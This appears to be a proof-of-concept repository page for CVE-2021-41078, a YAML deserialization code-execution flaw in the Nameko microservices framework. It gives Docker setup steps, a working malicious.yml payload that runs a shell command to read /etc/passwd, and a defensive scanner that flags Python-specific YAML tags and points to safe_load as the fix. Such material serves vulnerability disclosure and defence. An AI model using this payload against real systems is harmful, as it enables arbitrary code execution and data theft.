CVE-2021-41078 PoC — Nameko Code Issue Vulnerability

Source
Associated Vulnerability
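Title: Nameko Code Issue Vulnerability (CVE-2021-41078)
Description: Nameko is a Python framework for building microservices. Nameko has a security vulnerability: when deserializing a configuration file, Nameko in 2.13.0 can be tricked into executing arbitrary code.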
Description
nameko Arbitrary code execution due to YAML deserialization
Readme
# CVE-2021-41078
nameko Arbitrary code execution due to YAML deserialization

## NVD Description

Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.

## Demo

![cve-2021-41078](https://user-images.githubusercontent.com/56715563/187062984-fb0c5149-92a6-4440-8731-6260465bfc2a.gif)

## Set Up

1. Build an image from a Dockerfile

```
docker build -t cve-2021-41078 .
```

2. Run `python main.py` in a new container

```
docker run -it --rm cve-2021-41078
```

Output (the contents of `/etc/passwd`):
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --
```

![output-image](https://user-images.githubusercontent.com/56715563/187062786-f420ceb8-e8be-42ee-989e-b657ede803a1.png)

## PoC Payload

malicious.yml
```
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
```
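
An added example, not part of the original README or the Nameko project: a standard-library scanner that flags the Python-specific YAML tags this payload relies on before a config file reaches a loader, plus an optional check (assuming PyYAML is installed) that `yaml.safe_load` refuses the document. `BENIGN_CONFIG` is a constructed sample, and the function and constant names are hypothetical.

```python
import re

try:
    import yaml  # PyYAML; optional, only used by safe_load_rejects()
except ImportError:
    yaml = None

# Python-specific tags in shorthand (!!python/...) or verbatim
# (!<tag:yaml.org,2002:python/...>) form.
PY_TAG = re.compile(r"(?:!!|!<tag:yaml\.org,2002:)python/[^\s>,\]}]+")
# A %TAG directive that remaps a handle into the yaml.org namespace can
# hide the same tags behind a custom prefix, so it is reported as well.
TAG_DIRECTIVE = re.compile(r"^%TAG\s+\S+\s+tag:yaml\.org,2002:\S*")

# The malicious.yml payload shown on this page (scanned as text only).
PAGE_PAYLOAD = """\
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
"""

# Constructed benign config for comparison.
BENIGN_CONFIG = """\
AMQP_URI: 'pyamqp://guest:guest@localhost'
WEB_SERVER_ADDRESS: '0.0.0.0:8000'
"""

def scan_yaml_text(text):
    """Return (line_number, tag) for every Python-specific tag found."""
    # Conservative: comments and quoted strings are scanned too.
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        directive = TAG_DIRECTIVE.match(line)
        if directive:
            findings.append((lineno, directive.group(0)))
        findings.extend((lineno, m.group(0)) for m in PY_TAG.finditer(line))
    return findings

def safe_load_rejects(text):
    """True if yaml.safe_load refuses the document; None without PyYAML."""
    if yaml is None:
        return None
    try:
        yaml.safe_load(text)
    except yaml.YAMLError:
        return True
    return False
```

The scan is a review and detection aid for config repositories; the loader-side mitigation is a loader that does not construct Python objects, such as PyYAML's `yaml.safe_load`.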

## Reference

- https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g
File Snapshot

```
[4.0K] /data/pocs/8144d75a8fe3f54de1539c8c48d4d7fa165d7302
├── [ 144] Dockerfile
├── [1.0K] LICENSE
├── [ 144] malicious.yml
└── [1.0K] README.md

0 directories, 4 files
```